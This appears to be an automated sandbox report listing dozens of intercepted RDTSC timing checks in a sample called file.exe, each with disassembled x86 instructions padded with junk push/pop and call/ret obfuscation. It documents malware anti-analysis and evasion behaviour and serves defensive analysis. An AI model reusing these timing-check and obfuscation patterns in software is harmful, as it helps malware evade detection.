Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4CFE9 second address: B4CFED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4CFED second address: B4D015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0AD95F8839h 0x0000000b pushad 0x0000000c jns 00007F0AD95F8826h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4D173 second address: B4D19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0AD8C6A9B6h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0AD8C6A9C9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4D19A second address: B4D1A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4D1A1 second address: B4D1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0AD8C6A9BFh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4D4B2 second address: B4D4C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0AD95F882Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DAF4 second address: B4DAF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DAF8 second address: B4DB02 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0AD95F8826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DB02 second address: B4DB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B50DA4 second address: B50DBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8832h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B55E42 second address: B55E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F0AD8C6A9BAh 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B177C4 second address: B177CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B17CF9 second address: 96DB7E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0AD8C6A9BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d or dword ptr [ebp+122D37EBh], edi 0x00000013 push dword ptr [ebp+122D1595h] 0x00000019 mov dx, 2BEBh 0x0000001d call dword ptr [ebp+122D3589h] 0x00000023 pushad 0x00000024 jng 00007F0AD8C6A9BCh 0x0000002a mov dword ptr [ebp+122D34B1h], eax 0x00000030 xor eax, eax 0x00000032 jmp 00007F0AD8C6A9BEh 0x00000037 add dword ptr [ebp+122D34B1h], ebx 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 or dword ptr [ebp+122D34B1h], ebx 0x00000047 add dword ptr [ebp+122D34B1h], edi 0x0000004d mov dword ptr [ebp+122D29C9h], eax 0x00000053 mov dword ptr [ebp+122D34B1h], edi 0x00000059 mov esi, 0000003Ch 0x0000005e mov dword ptr [ebp+122D2E75h], edx 0x00000064 add esi, dword ptr [esp+24h] 0x00000068 jg 00007F0AD8C6A9B7h 0x0000006e lodsw 0x00000070 jmp 00007F0AD8C6A9C2h 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 jmp 00007F0AD8C6A9BEh 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 mov dword ptr [ebp+122D34B1h], edi 0x00000088 push eax 0x00000089 pushad 0x0000008a push esi 0x0000008b push eax 0x0000008c push edx 0x0000008d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1808D second address: B180BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8835h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007F0AD95F883Dh 0x00000010 pushad 0x00000011 jmp 00007F0AD95F882Fh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1833B second address: B18341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18341 second address: B18348 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18348 second address: B183AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F0AD8C6A9B8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 jg 00007F0AD8C6A9BCh 0x0000002a push 00000004h 0x0000002c pushad 0x0000002d mov dword ptr [ebp+122D27B2h], edi 0x00000033 mov ax, di 0x00000036 popad 0x00000037 nop 0x00000038 jnp 00007F0AD8C6A9C8h 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jnc 00007F0AD8C6A9B6h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18A45 second address: B18A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18A4A second address: B18A51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18AC7 second address: B18ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18ACB second address: B18AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18AD1 second address: B18B3D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jns 00007F0AD95F882Ch 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jng 00007F0AD95F8826h 0x00000019 popad 0x0000001a popad 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007F0AD95F8828h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 jg 00007F0AD95F882Ch 0x0000003c mov dword ptr [ebp+122D1B38h], ecx 0x00000042 lea eax, dword ptr [ebp+1247D54Ch] 0x00000048 mov edi, 5DFB78C1h 0x0000004d nop 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 jnp 00007F0AD95F8826h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18B3D second address: B18B53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18B53 second address: B18B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18B5A second address: B18BBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F0AD8C6A9B8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov di, EE3Dh 0x00000027 or dword ptr [ebp+122D37E6h], esi 0x0000002d lea eax, dword ptr [ebp+1247D508h] 0x00000033 jbe 00007F0AD8C6A9B9h 0x00000039 mov cx, bx 0x0000003c mov edx, 3BB5A890h 0x00000041 nop 0x00000042 push eax 0x00000043 push edx 0x00000044 push edi 0x00000045 jmp 00007F0AD8C6A9C4h 0x0000004a pop edi 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18BBA second address: B18BBF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B551E6 second address: B551EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B55866 second address: B5587C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F882Dh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5A091 second address: B5A0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0AD8C6A9B6h 0x0000000a pop ecx 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F0AD8C6A9B6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5A0AB second address: B5A0AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5A0AF second address: B5A0B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5A7DB second address: B5A7DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5AC6F second address: B5AC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5ADCD second address: B5ADD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5B092 second address: B5B0A6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0AD8C6A9B8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F0AD8C6A9B6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B60474 second address: B60478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FFFA second address: B6000F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F0AD8C6A9BFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6000F second address: B60014 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B654A5 second address: B654A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B654A9 second address: B654BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 js 00007F0AD95F8826h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B654BF second address: B654C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B65648 second address: B65652 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B65652 second address: B65658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B65658 second address: B6565C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6565C second address: B65667 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B657CF second address: B657D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B69F02 second address: B69F06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B69F06 second address: B69F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0AD95F8835h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6A251 second address: B6A25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6A6AF second address: B6A6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6A6B3 second address: B6A6BD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6A6BD second address: B6A6E3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0AD95F882Ch 0x00000008 push ebx 0x00000009 ja 00007F0AD95F8826h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0AD95F882Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6A9BE second address: B6A9DE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F0AD8C6A9B6h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0AD8C6A9C0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6E554 second address: B6E56E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F0AD95F882Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6DDDC second address: B6DE00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F0AD8C6A9B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F0AD8C6A9C3h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6E242 second address: B6E254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0AD95F882Dh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B73851 second address: B73883 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0AD8C6A9C0h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0AD8C6A9C6h 0x00000010 ja 00007F0AD8C6A9B6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B739D1 second address: B739D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B73C83 second address: B73CB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C1h 0x00000007 jns 00007F0AD8C6A9B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F0AD8C6A9C5h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B73CB6 second address: B73CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F882Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B73CC5 second address: B73CE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD8C6A9C8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B745A5 second address: B745AF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0AD95F8832h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B745AF second address: B745B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B74B96 second address: B74B9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B74B9B second address: B74BB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0AD8C6A9C2h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B74BB4 second address: B74BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F0AD95F8832h 0x0000000b jns 00007F0AD95F8826h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B753EA second address: B75406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD8C6A9C0h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B75406 second address: B7540D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7540D second address: B75456 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0AD8C6A9C9h 0x00000008 push ebx 0x00000009 jmp 00007F0AD8C6A9C8h 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jne 00007F0AD8C6A9D2h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0AD8C6A9BAh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B75456 second address: B75460 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0AD95F8826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B791B7 second address: B791BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B79A6A second address: B79A6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B79D20 second address: B79D51 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F0AD8C6A9C2h 0x00000010 jmp 00007F0AD8C6A9BEh 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B84793 second address: B847AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD95F8833h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B84A9B second address: B84AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jne 00007F0AD8C6A9BAh 0x0000000b je 00007F0AD8C6A9BCh 0x00000011 js 00007F0AD8C6A9B6h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0AD8C6A9BFh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B84AC8 second address: B84AD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F0AD95F8826h 0x00000009 jne 00007F0AD95F8826h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B85459 second address: B8545E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8545E second address: B85479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F0AD95F8836h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B85479 second address: B8548D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007F0AD8C6A9B8h 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8548D second address: B854CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0AD95F882Ah 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F0AD95F8837h 0x00000012 jmp 00007F0AD95F8834h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B854CB second address: B854D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B85BDF second address: B85BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B85BE3 second address: B85BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B85BE9 second address: B85BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B85BEF second address: B85BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B85BF3 second address: B85C2E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnl 00007F0AD95F8826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F0AD95F8834h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0AD95F8830h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B85C2E second address: B85C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8AB59 second address: B8AB79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0AD95F8833h 0x0000000c jp 00007F0AD95F8826h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8E9D3 second address: B8EA05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F0AD8C6A9C9h 0x00000008 jns 00007F0AD8C6A9B6h 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F0AD8C6A9BAh 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
